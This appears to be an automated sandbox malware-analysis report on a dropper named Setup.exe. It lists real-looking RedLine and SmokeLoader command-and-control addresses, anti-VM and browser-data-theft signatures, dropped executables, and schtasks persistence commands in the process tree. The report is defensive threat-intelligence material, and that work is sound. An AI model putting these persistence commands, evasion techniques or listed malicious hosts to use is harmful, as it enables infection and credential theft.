Analysis
-
max time kernel
67s -
max time network
150s -
platform
windows10_x64 -
resource
win10-en-20211014 -
submitted
19/11/2021, 19:02
Static task
static1
Behavioral task
behavioral1
Sample
Setup.exe
Resource
win7-en-20211104
General
-
Target
Setup.exe
-
Size
554KB
-
MD5
d9552a15a61f255df3206b63ee0383be
-
SHA1
7c76e2edcf184b90d40003dac71b08e3a3ed2e8c
-
SHA256
0cdd906491990c6ba9c24bdd60172057587859a8e649ba7f4b51fece9a0fdac6
-
SHA512
0ce1db824d226df28177b6e5394fa1f8483333583d8332680d4cf0cfc8627a53d69c1c857b319dd200e0f38bf88d445a4289d78472fe3167cc39ae6a85f21599
Malware Config
Extracted
socelars
http://www.gianninidesign.com/
Extracted
redline
bbbb
37.9.13.169:63912
Extracted
redline
udptest
193.56.146.64:65441
Extracted
redline
555
91.206.14.151:64591
Extracted
smokeloader
2020
http://membro.at/upload/
http://jeevanpunetha.com/upload/
http://misipu.cn/upload/
http://zavodooo.ru/upload/
http://targiko.ru/upload/
http://vues3d.com/upload/
Extracted
metasploit
windows/single_exec
Signatures
-
MetaSploit
Detected malicious payload which is part of the Metasploit Framework, likely generated with msfvenom or similar.
-
Process spawned unexpected child process 2 IoCs
This typically indicates the parent process was compromised via an exploit or macro.
description pid pid_target Process procid_target Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 4336 4732 rundll32.exe 122 Parent C:\Windows\system32\wbem\wmiprvse.exe is not expected to spawn this process 7020 4732 rundll32.exe 122 -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine Payload 6 IoCs
resource yara_rule behavioral2/memory/1072-259-0x00000000023A0000-0x00000000023CE000-memory.dmp family_redline behavioral2/memory/1724-268-0x0000000000500000-0x0000000000520000-memory.dmp family_redline behavioral2/memory/1072-272-0x0000000002480000-0x00000000024AC000-memory.dmp family_redline behavioral2/memory/312-277-0x0000000000400000-0x0000000000420000-memory.dmp family_redline behavioral2/memory/1724-296-0x0000000000518EEE-mapping.dmp family_redline behavioral2/memory/312-301-0x0000000000418EFE-mapping.dmp family_redline -
SmokeLoader
Modular backdoor trojan in use since 2014.
-
Socelars Payload 2 IoCs
resource yara_rule behavioral2/files/0x000400000001ac0b-133.dat family_socelars behavioral2/files/0x000400000001ac0b-132.dat family_socelars -
Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs
-
Vidar Stealer 1 IoCs
resource yara_rule behavioral2/memory/1572-252-0x0000000002200000-0x00000000022D5000-memory.dmp family_vidar -
Downloads MZ/PE file
-
Executes dropped EXE 28 IoCs
pid Process 2264 YIom9MplWv2EdICGV3pNwsMp.exe 512 g0xmn6u7LbKLtk3Q_FOJkaa1.exe 2236 D2iekO3L2Z2yXRah6Fyyo_Tq.exe 2256 IPkZZkIpJIP4h4aZO88aFQU8.exe 1572 ZmGwCijz_aF6kekXlZOAQ8Bm.exe 3880 aWO3kyDWUY6qOk8aw7dUT6ep.exe 804 PB2I64qARSFDtYJ3nobcBQFo.exe 60 QV0IFeEZkl3FCtLgF98mEOh9.exe 1488 e1CrrXCkZ8t_nyzdNUuoLNt_.exe 1364 8u0oitmhgevh1MzSaqj9ppEe.exe 360 DllHost.exe 596 GnYY58_zNkV7iYJyGcEVYFxH.exe 2352 n7IoPyl0GofJiCvMJ26_RxWk.exe 1072 uw3x5UZ_x4Ps_eaCOFD55IW_.exe 1060 JkEAwDR9eFf1IiksFz8QTw_O.exe 600 L9S67PdEwQEN8zxKqmVrVq_C.exe 3196 TCmEOe83n5q_zlXj1ichAwHp.exe 2600 ZOfaCe2gP2ntE8UsdnOMtkcn.exe 1216 2FwGPMS0DwsAJmJt30kqxVWa.exe 348 gf4yL6i5_1EnGcL45rapBi4N.exe 2284 Di68BgTKfVJrtOniWjpuFeoP.exe 1752 tk0pJOIVedvbbDoftQOGUQGr.exe 1280 jjJwr9ifpZzN9Q81BgUEgmtM.exe 1868 3fzJvJsNxh3XgOwzydSsFjvG.exe 3424 a5fd8PV6jg7cJ2ynvQgXPvjV.exe 900 jg1_1faf.exe 2216 rtst1039.exe 1260 7IMHR70sE01sKpdv3ItQAxCA.exe -
resource yara_rule behavioral2/files/0x000400000001ac28-341.dat upx behavioral2/files/0x000400000001ac28-338.dat upx behavioral2/files/0x000400000001ac28-448.dat upx behavioral2/files/0x000400000001ac28-463.dat upx -
Checks BIOS information in registry 2 TTPs 14 IoCs
BIOS information is often read in order to detect sandboxing environments.
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 2FwGPMS0DwsAJmJt30kqxVWa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion TCmEOe83n5q_zlXj1ichAwHp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion Di68BgTKfVJrtOniWjpuFeoP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 3fzJvJsNxh3XgOwzydSsFjvG.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion tk0pJOIVedvbbDoftQOGUQGr.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion n7IoPyl0GofJiCvMJ26_RxWk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion n7IoPyl0GofJiCvMJ26_RxWk.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion QV0IFeEZkl3FCtLgF98mEOh9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion TCmEOe83n5q_zlXj1ichAwHp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion Di68BgTKfVJrtOniWjpuFeoP.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion 2FwGPMS0DwsAJmJt30kqxVWa.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion QV0IFeEZkl3FCtLgF98mEOh9.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion 3fzJvJsNxh3XgOwzydSsFjvG.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\VideoBiosVersion tk0pJOIVedvbbDoftQOGUQGr.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-941723256-3451054534-3089625102-1000\Control Panel\International\Geo\Nation Setup.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
resource yara_rule behavioral2/files/0x000400000001ac22-185.dat themida behavioral2/files/0x000400000001ac1b-182.dat themida behavioral2/files/0x000400000001ac1f-180.dat themida behavioral2/files/0x000400000001ac1f-179.dat themida behavioral2/files/0x000400000001ac1c-178.dat themida behavioral2/files/0x000400000001ac1c-177.dat themida behavioral2/files/0x000500000001ac07-172.dat themida behavioral2/files/0x000500000001ac07-171.dat themida behavioral2/files/0x000400000001ac1b-181.dat themida behavioral2/files/0x000400000001ac0d-153.dat themida behavioral2/files/0x000400000001ac0d-152.dat themida behavioral2/memory/1752-230-0x0000000001260000-0x0000000001261000-memory.dmp themida behavioral2/memory/2284-227-0x0000000001090000-0x0000000001091000-memory.dmp themida behavioral2/memory/60-215-0x0000000000180000-0x0000000000181000-memory.dmp themida behavioral2/memory/3196-216-0x0000000000260000-0x0000000000261000-memory.dmp themida behavioral2/memory/1868-238-0x0000000000AA0000-0x0000000000AA1000-memory.dmp themida -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
description ioc Process Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA Di68BgTKfVJrtOniWjpuFeoP.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA tk0pJOIVedvbbDoftQOGUQGr.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 3fzJvJsNxh3XgOwzydSsFjvG.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA 2FwGPMS0DwsAJmJt30kqxVWa.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA n7IoPyl0GofJiCvMJ26_RxWk.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA QV0IFeEZkl3FCtLgF98mEOh9.exe Key value queried \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA TCmEOe83n5q_zlXj1ichAwHp.exe -
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 11 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 23 api.db-ip.com 122 ipinfo.io 124 api.db-ip.com 19 ipinfo.io 20 ipinfo.io 137 ip-api.com 189 ipinfo.io 191 api.db-ip.com 366 ip-api.com 24 api.db-ip.com 121 ipinfo.io -
Looks up geolocation information via web service
Uses a legitimate geolocation service to find the infected system's geolocation info.
-
Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
pid Process 60 QV0IFeEZkl3FCtLgF98mEOh9.exe 3196 TCmEOe83n5q_zlXj1ichAwHp.exe 2284 Di68BgTKfVJrtOniWjpuFeoP.exe 1752 tk0pJOIVedvbbDoftQOGUQGr.exe 1868 3fzJvJsNxh3XgOwzydSsFjvG.exe -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 360 set thread context of 1260 360 DllHost.exe 103 -
Drops file in Program Files directory 5 IoCs
description ioc Process File created C:\Program Files (x86)\Company\NewProduct\Uninstall.ini GnYY58_zNkV7iYJyGcEVYFxH.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\inst2.exe GnYY58_zNkV7iYJyGcEVYFxH.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\jg1_1faf.exe GnYY58_zNkV7iYJyGcEVYFxH.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\rtst1039.exe GnYY58_zNkV7iYJyGcEVYFxH.exe File opened for modification C:\Program Files (x86)\Company\NewProduct\Uninstall.exe GnYY58_zNkV7iYJyGcEVYFxH.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 8 IoCs
pid pid_target Process procid_target 3404 1280 WerFault.exe 80 1256 1488 WerFault.exe 93 4184 1216 WerFault.exe 84 4208 2352 WerFault.exe 88 4376 1488 WerFault.exe 93 4664 1488 WerFault.exe 93 4908 1488 WerFault.exe 93 3440 1488 WerFault.exe 93 -
Checks SCSI registry key(s) 3 TTPs 3 IoCs
SCSI information is often read in order to detect sandboxing environments.
description ioc Process Key enumerated \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8u0oitmhgevh1MzSaqj9ppEe.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8u0oitmhgevh1MzSaqj9ppEe.exe Key queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI 8u0oitmhgevh1MzSaqj9ppEe.exe -
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4864 schtasks.exe 4816 schtasks.exe -
Delays execution with timeout.exe 1 IoCs
pid Process 1048 timeout.exe -
Kills process with taskkill 3 IoCs
pid Process 4976 taskkill.exe 932 taskkill.exe 5860 taskkill.exe -
Suspicious behavior: EnumeratesProcesses 64 IoCs
pid Process 3484 Setup.exe 3484 Setup.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe 2264 YIom9MplWv2EdICGV3pNwsMp.exe -
Suspicious use of AdjustPrivilegeToken 37 IoCs
description pid Process Token: SeCreateTokenPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeAssignPrimaryTokenPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeLockMemoryPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeIncreaseQuotaPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeMachineAccountPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeTcbPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeSecurityPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeTakeOwnershipPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeLoadDriverPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeSystemProfilePrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeSystemtimePrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeProfSingleProcessPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeIncBasePriorityPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeCreatePagefilePrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeCreatePermanentPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeBackupPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeRestorePrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeShutdownPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeDebugPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeAuditPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeSystemEnvironmentPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeChangeNotifyPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeRemoteShutdownPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeUndockPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeSyncAgentPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeEnableDelegationPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeManageVolumePrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeImpersonatePrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeCreateGlobalPrivilege 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: 31 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: 32 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: 33 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: 34 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: 35 804 PB2I64qARSFDtYJ3nobcBQFo.exe Token: SeRestorePrivilege 3404 WerFault.exe Token: SeBackupPrivilege 3404 WerFault.exe Token: SeDebugPrivilege 3404 WerFault.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 3484 wrote to memory of 2264 3484 Setup.exe 69 PID 3484 wrote to memory of 2264 3484 Setup.exe 69 PID 3484 wrote to memory of 512 3484 Setup.exe 70 PID 3484 wrote to memory of 512 3484 Setup.exe 70 PID 3484 wrote to memory of 512 3484 Setup.exe 70 PID 3484 wrote to memory of 2236 3484 Setup.exe 73 PID 3484 wrote to memory of 2236 3484 Setup.exe 73 PID 3484 wrote to memory of 2236 3484 Setup.exe 73 PID 3484 wrote to memory of 2256 3484 Setup.exe 72 PID 3484 wrote to memory of 2256 3484 Setup.exe 72 PID 3484 wrote to memory of 1572 3484 Setup.exe 71 PID 3484 wrote to memory of 1572 3484 Setup.exe 71 PID 3484 wrote to memory of 1572 3484 Setup.exe 71 PID 3484 wrote to memory of 804 3484 Setup.exe 75 PID 3484 wrote to memory of 804 3484 Setup.exe 75 PID 3484 wrote to memory of 804 3484 Setup.exe 75 PID 3484 wrote to memory of 3880 3484 Setup.exe 74 PID 3484 wrote to memory of 3880 3484 Setup.exe 74 PID 3484 wrote to memory of 3880 3484 Setup.exe 74 PID 3484 wrote to memory of 60 3484 Setup.exe 78 PID 3484 wrote to memory of 60 3484 Setup.exe 78 PID 3484 wrote to memory of 60 3484 Setup.exe 78 PID 3484 wrote to memory of 596 3484 Setup.exe 90 PID 3484 wrote to memory of 596 3484 Setup.exe 90 PID 3484 wrote to memory of 596 3484 Setup.exe 90 PID 3484 wrote to memory of 360 3484 Setup.exe 104 PID 3484 wrote to memory of 360 3484 Setup.exe 104 PID 3484 wrote to memory of 360 3484 Setup.exe 104 PID 3484 wrote to memory of 2352 3484 Setup.exe 88 PID 3484 wrote to memory of 2352 3484 Setup.exe 88 PID 3484 wrote to memory of 2352 3484 Setup.exe 88 PID 3484 wrote to memory of 1072 3484 Setup.exe 91 PID 3484 wrote to memory of 1072 3484 Setup.exe 91 PID 3484 wrote to memory of 1072 3484 Setup.exe 91 PID 3484 wrote to memory of 1488 3484 Setup.exe 93 PID 3484 wrote to memory of 1488 3484 Setup.exe 93 PID 3484 wrote to memory of 1488 3484 Setup.exe 93 PID 3484 wrote to memory of 1364 3484 Setup.exe 94 PID 3484 wrote to memory of 1364 3484 Setup.exe 94 PID 3484 wrote to memory of 1364 3484 Setup.exe 94 PID 3484 wrote to memory of 600 3484 Setup.exe 89 PID 3484 wrote to memory of 600 3484 Setup.exe 89 PID 3484 wrote to memory of 600 3484 Setup.exe 89 PID 3484 wrote to memory of 3196 3484 Setup.exe 85 PID 3484 wrote to memory of 3196 3484 Setup.exe 85 PID 3484 wrote to memory of 3196 3484 Setup.exe 85 PID 3484 wrote to memory of 2600 3484 Setup.exe 86 PID 3484 wrote to memory of 2600 3484 Setup.exe 86 PID 3484 wrote to memory of 2600 3484 Setup.exe 86 PID 3484 wrote to memory of 1060 3484 Setup.exe 92 PID 3484 wrote to memory of 1060 3484 Setup.exe 92 PID 3484 wrote to memory of 1216 3484 Setup.exe 84 PID 3484 wrote to memory of 1216 3484 Setup.exe 84 PID 3484 wrote to memory of 1216 3484 Setup.exe 84 PID 3484 wrote to memory of 1752 3484 Setup.exe 83 PID 3484 wrote to memory of 1752 3484 Setup.exe 83 PID 3484 wrote to memory of 1752 3484 Setup.exe 83 PID 3484 wrote to memory of 348 3484 Setup.exe 82 PID 3484 wrote to memory of 348 3484 Setup.exe 82 PID 3484 wrote to memory of 348 3484 Setup.exe 82 PID 3484 wrote to memory of 2284 3484 Setup.exe 81 PID 3484 wrote to memory of 2284 3484 Setup.exe 81 PID 3484 wrote to memory of 2284 3484 Setup.exe 81 PID 3484 wrote to memory of 1280 3484 Setup.exe 80
Processes
-
C:\Users\Admin\AppData\Local\Temp\Setup.exe"C:\Users\Admin\AppData\Local\Temp\Setup.exe"1⤵
- Checks computer location settings
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3484 -
C:\Users\Admin\Pictures\Adobe Films\YIom9MplWv2EdICGV3pNwsMp.exe"C:\Users\Admin\Pictures\Adobe Films\YIom9MplWv2EdICGV3pNwsMp.exe"2⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
PID:2264
-
-
C:\Users\Admin\Pictures\Adobe Films\g0xmn6u7LbKLtk3Q_FOJkaa1.exe"C:\Users\Admin\Pictures\Adobe Films\g0xmn6u7LbKLtk3Q_FOJkaa1.exe"2⤵
- Executes dropped EXE
PID:512 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl LG" /sc ONLOGON /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4864
-
-
C:\Windows\SysWOW64\schtasks.exeschtasks /create /f /RU "Admin" /tr "C:\Program Files (x86)\PowerControl\PowerControl_Svc.exe" /tn "PowerControl HR" /sc HOURLY /rl HIGHEST3⤵
- Creates scheduled task(s)
PID:4816
-
-
C:\Users\Admin\Documents\MqOkvc3WyMrKcIQM2zzmbsWb.exe"C:\Users\Admin\Documents\MqOkvc3WyMrKcIQM2zzmbsWb.exe"3⤵PID:4800
-
C:\Users\Admin\Pictures\Adobe Films\rLQUtOL5YzAGb6NwWaChjRy8.exe"C:\Users\Admin\Pictures\Adobe Films\rLQUtOL5YzAGb6NwWaChjRy8.exe"4⤵PID:4604
-
-
C:\Users\Admin\Pictures\Adobe Films\eLEaclXkIz73ipO6piBphjOC.exe"C:\Users\Admin\Pictures\Adobe Films\eLEaclXkIz73ipO6piBphjOC.exe"4⤵PID:5036
-
-
C:\Users\Admin\Pictures\Adobe Films\jA8HODtCFbdZvxruUz1Qst1v.exe"C:\Users\Admin\Pictures\Adobe Films\jA8HODtCFbdZvxruUz1Qst1v.exe"4⤵PID:1832
-
-
C:\Users\Admin\Pictures\Adobe Films\oa8BchO6VxahD_f8vJDTjic6.exe"C:\Users\Admin\Pictures\Adobe Films\oa8BchO6VxahD_f8vJDTjic6.exe"4⤵PID:1356
-
-
C:\Users\Admin\Pictures\Adobe Films\VUmFo03BgPI48cthLstBKbwW.exe"C:\Users\Admin\Pictures\Adobe Films\VUmFo03BgPI48cthLstBKbwW.exe"4⤵PID:2248
-
-
C:\Users\Admin\Pictures\Adobe Films\pxFVo1W5MFI0ckCFnxGXLW81.exe"C:\Users\Admin\Pictures\Adobe Films\pxFVo1W5MFI0ckCFnxGXLW81.exe"4⤵PID:3144
-
C:\Users\Admin\AppData\Local\Temp\is-3AKCF.tmp\pxFVo1W5MFI0ckCFnxGXLW81.tmp"C:\Users\Admin\AppData\Local\Temp\is-3AKCF.tmp\pxFVo1W5MFI0ckCFnxGXLW81.tmp" /SL5="$10226,506127,422400,C:\Users\Admin\Pictures\Adobe Films\pxFVo1W5MFI0ckCFnxGXLW81.exe"5⤵PID:2076
-
C:\Users\Admin\AppData\Local\Temp\is-3G0SN.tmp\lakazet.exe"C:\Users\Admin\AppData\Local\Temp\is-3G0SN.tmp\lakazet.exe" /S /UID=27096⤵PID:664
-
C:\Users\Admin\AppData\Local\Temp\61-e5d3d-47c-4b38d-542a7db20f7e2\Wymyrymaena.exe"C:\Users\Admin\AppData\Local\Temp\61-e5d3d-47c-4b38d-542a7db20f7e2\Wymyrymaena.exe"7⤵PID:1720
-
-
C:\Users\Admin\AppData\Local\Temp\3e-4c772-d04-bc289-79342927dd8df\Qequhaqoga.exe"C:\Users\Admin\AppData\Local\Temp\3e-4c772-d04-bc289-79342927dd8df\Qequhaqoga.exe"7⤵PID:5188
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\loqacgg2.mlj\Install1.exe & exit8⤵PID:2968
-
C:\Users\Admin\AppData\Local\Temp\loqacgg2.mlj\Install1.exeC:\Users\Admin\AppData\Local\Temp\loqacgg2.mlj\Install1.exe9⤵PID:4404
-
C:\Users\Admin\AppData\Local\Temp\Install1.exeC:\Users\Admin\AppData\Local\Temp\Install1.exe10⤵PID:6568
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\ychnk0ph.pzt\vinmall_da.exe /silent & exit8⤵PID:3724
-
C:\Users\Admin\AppData\Local\Temp\ychnk0ph.pzt\vinmall_da.exeC:\Users\Admin\AppData\Local\Temp\ychnk0ph.pzt\vinmall_da.exe /silent9⤵PID:6536
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\h0bg120b.xbj\GcleanerEU.exe /eufive & exit8⤵PID:6224
-
C:\Users\Admin\AppData\Local\Temp\h0bg120b.xbj\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\h0bg120b.xbj\GcleanerEU.exe /eufive9⤵PID:6640
-
C:\Users\Admin\AppData\Local\Temp\h0bg120b.xbj\GcleanerEU.exeC:\Users\Admin\AppData\Local\Temp\h0bg120b.xbj\GcleanerEU.exe /eufive10⤵PID:6692
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\wvdimhar.uti\vpn.exe /silent /subid=798 & exit8⤵PID:6616
-
C:\Users\Admin\AppData\Local\Temp\wvdimhar.uti\vpn.exeC:\Users\Admin\AppData\Local\Temp\wvdimhar.uti\vpn.exe /silent /subid=7989⤵PID:7052
-
C:\Users\Admin\AppData\Local\Temp\is-TUHM8.tmp\vpn.tmp"C:\Users\Admin\AppData\Local\Temp\is-TUHM8.tmp\vpn.tmp" /SL5="$10416,15170975,270336,C:\Users\Admin\AppData\Local\Temp\wvdimhar.uti\vpn.exe" /silent /subid=79810⤵PID:7164
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\uninstall.bat" "11⤵PID:5868
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe remove tap090112⤵PID:5768
-
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\MaskVPN\driver\win764\install.bat" "11⤵PID:6784
-
C:\Program Files (x86)\MaskVPN\driver\win764\tapinstall.exetapinstall.exe install OemVista.inf tap090112⤵PID:4784
-
-
-
-
-
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /k C:\Users\Admin\AppData\Local\Temp\14es1gqk.zxw\installer.exe /qn CAMPAIGN="654" & exit8⤵PID:6800
-
C:\Users\Admin\AppData\Local\Temp\14es1gqk.zxw\installer.exeC:\Users\Admin\AppData\Local\Temp\14es1gqk.zxw\installer.exe /qn CAMPAIGN="654"9⤵PID:7044
-
